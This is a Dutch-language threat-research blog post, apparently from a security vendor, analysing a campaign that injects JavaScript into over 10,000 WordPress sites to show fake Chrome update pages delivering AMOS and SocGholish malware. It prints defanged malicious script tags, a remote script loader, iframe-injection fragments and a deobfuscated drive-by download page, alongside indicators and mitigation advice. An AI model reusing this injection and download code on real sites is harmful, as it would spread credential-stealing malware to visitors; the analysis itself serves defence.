Deze week identificeerden we meer dan 10.000 WordPress-sites die via een iframe nep-Google-browserupdatepagina's tonen aan bezoekers.
De pagina verspreidt platformonafhankelijke malware: zowel AMOS (Atomic macOS Stealer), gericht op Apple-gebruikers, als SocGholish, gericht op Windows-gebruikers.
Dit zijn populaire en commercieel verkrijgbare malwarevarianten die al een tijdje in omloop zijn. Doorgaans wordt aangenomen dat beide varianten door verschillende aanvallersgroepen worden verspreid — een aanname die deze bevinding tegenspreekt.
Voor zover wij weten is dit ook de eerste keer dat ze worden afgeleverd via een client-side aanval. JavaScript dat in de browser van de gebruiker wordt geladen, genereert de neppagina in een iframe. De aanvallers maken gebruik van verouderde WordPress-versies en plugins om detectie te bemoeilijken voor websites zonder een client-side monitoringtool.
De aanvallers hebben waarschijnlijk een kwetsbaarheid in een WordPress-plugin misbruikt om de kwaadaardige JavaScript te injecteren. Dit bestand wordt momenteel door geen enkele threat feed-leverancier gemarkeerd, en het domein evenmin.
Hieronder staan twee van de grootste domeinen die op duizenden websites zijn aangetroffen:
Technische details
Met behulp van onze detectie-engine vonden we een initieel verdacht JavaScript-bestand van een derde partij op de volgende URL:
https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js
Ons platform markeerde dit als een kwaadaardig script met hoge zekerheid, vanwege de sterk geobfusceerde aard ervan, waarbij meerdere lagen van codering werden gebruikt. Dit leidde tot verder onderzoek, waarmee we een netwerk van meer dan 10.000 geïnfecteerde WordPress-websites ontdekten.
Een voorbeeld van een gecompromitteerde site is beschikbaar in onze domeindirectory.
Blackshelter[.]org stuurt de gebruiker door naar fastcloudcdn[.]com (onze directorylink), waar de kwaadaardige JavaScript wordt gehost.
Vervolgens identificeerden we meerdere kwaadaardige scripts die op verschillende domeinen worden gehost.
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://blacksaltys[.]com/2xIsQSDP8CyeXrv78zk9FGV8lZIj9SXKVc-Mpx3O5H0" id="ms_main_script-js" defer></script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://objmapper[.]com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e" id="ucf_main_script-js" defer></script>Verschillende sites bevatten <link>-elementen die zijn ontworpen om DNS te prefetchen voor kwaadaardige domeinen, waarschijnlijk om de prestaties van hun operaties te verbeteren:
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
<link rel='dns-prefetch' href='//blacksaltys[.]com' />
<link rel='dns-prefetch' href='//objmapper[.]com' />
<link rel='dns-prefetch' href='//blackshelter[.]org' />Een zelf-aanroepende anonieme functie laadt dynamisch een extern JavaScript-bestand:
;(function(o, q, f, e, w, j) {
w = q.createElement(f);
j = q.getElementsByTagName(f)[0];
w.async = 1;
w.src = e;
j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);Het externe script wordt dynamisch geladen en uitgevoerd, met een queryparameter (qbsfsc) die een Unix-tijdstempel bevat om cachemechanismen te omzeilen.
Waargenomen kwaadaardig gedrag
Het geobfusceerde script voert verschillende acties uit.
Eerst stopt het alle lopende browseractiviteit.
window.stop();
Vervolgens verwijdert het attributen zoals class, style, id, enzovoort, van belangrijke HTML-elementen.
for (let at of [["class", "style", "lang", "id", "dir"]]) {
el.removeAttribute(at);}Daarna injecteert het dynamisch het iframe in de pagina, waarmee de nep-Chrome-updatepagina wordt weergegeven.
let frame = document.createElement("iframe");
frame.srcdoc = rsd;
document.body.appendChild(frame);Analyse en bevindingen
Uit onze analyse bleek dat de gecompromitteerde websites verouderde versies van WordPress (6.7.1) en bijbehorende plugins draaiden, die aanvallers mogelijk hebben misbruikt om kwaadaardige code te injecteren.
We identificeerden 27 kwaadaardige domeinen die aan deze activiteit zijn gekoppeld.
Enkele voorbeelden:
- blacksaltys[.]com
- objmapper[.]com
- rednosehorse[.]com
- Blackshelter[.]org
Het kwaadaardige script op https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js had een detectieratio van 17/96 op het VirusTotal-rapport.
Tijdens onze analyse ontdekten we dat deze campagne niet alleen Windows-platforms aanvalt, maar ook malware voor macOS verspreidt. We hebben met succes een dmg-bestand gedownload dat aan de macOS-malware is gekoppeld.
macOS- en Windows-malware gedecodeerd
Het malwarebestand (274efb6bb2f95deb7c7f8192919bf690d69c3f3a441c81fe2a24284d5f274973) werd op het moment van analyse gemarkeerd door 6 antivirusleveranciers.
De volgende code werd blootgelegd na meerdere lagen van deobfuscatie. Het maakt dynamisch het AMOS (Atomic Mac OS Stealer) macOS-malwarebestand aan en downloadt dit.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
</head>
<body>
<script>
(async () => {
try {
var btn = document.createElement("a");
btn.href = `hxxps://extendedstaybrunswick[.]com/wp-content/plugins/reset-wp/resty.php?eg=${Math.floor(Date.now() / 1000)}`;
btn.download = "C_6.12.4.dmg";
document.body.appendChild(btn);
parent.postMessage("loaded", "*");
window.addEventListener("message", function (event) {
if (event.data == "download") {
setTimeout(function () {
btn.click();
}, 100);
}
});
} catch (e) { }
})()
</script>
</body>
</html>Het script genereert dynamisch een downloadknop die is gekoppeld aan de macOS-malwarepayload. Het luistert naar een "message"-event met de waarde "download", wat de bestandsdownload activeert.
Hier zijn twee bronnen om meer te leren over de AMOS-malware:
Daarnaast is hier een bron om meer te leren over de SocGholish Windows-malware:
Zowel AMOS als SocGholish zijn commercieel verkrijgbare malware en kunnen worden aangeschaft via Telegram.
Mitigatie en bescherming
Begin met het updaten van je WordPress-installatie. Update je plugins, beoordeel het gebruik ervan en verwijder ongebruikte plugins. Zoek naar de scripts en verwijder ze indien aangetroffen. Aanvallers laten vrijwel altijd een achterdeur achter. Zoek die op en verwijder hem.
Als je deze scripts op je site aantreft, raden we sterk aan om de logs van de afgelopen 90 dagen te controleren op indicatoren van compromittering of kwaadaardige activiteit.
Als je bestanden hebt gedownload van de getroffen websites, wordt een grondige systeemopschoning aanbevolen om mogelijke malware-infectie te beperken.
cside kan client-side aanvallen zoals deze detecteren, melden en blokkeren dankzij onze geavanceerde detectie-engine en proxy. Deze aanval zou zijn gedetecteerd en geblokkeerd met cside geïnstalleerd, waardoor nietsvermoedende gebruikers worden beschermd tegen de kwaadaardige malwaredownload.
Deze aanval onderstreept het belang van het beveiligen van de webtoeleveringsketen en het up-to-date houden van software. Op basis van onze analyse doen we de volgende aanbevelingen:
Je kunt gratis beginnen of contact met ons opnemen.
Volledige lijst van geïnfecteerde websites
Veilige links naar de PublicWWW-pagina's van de geïnfecteerde domeinen:
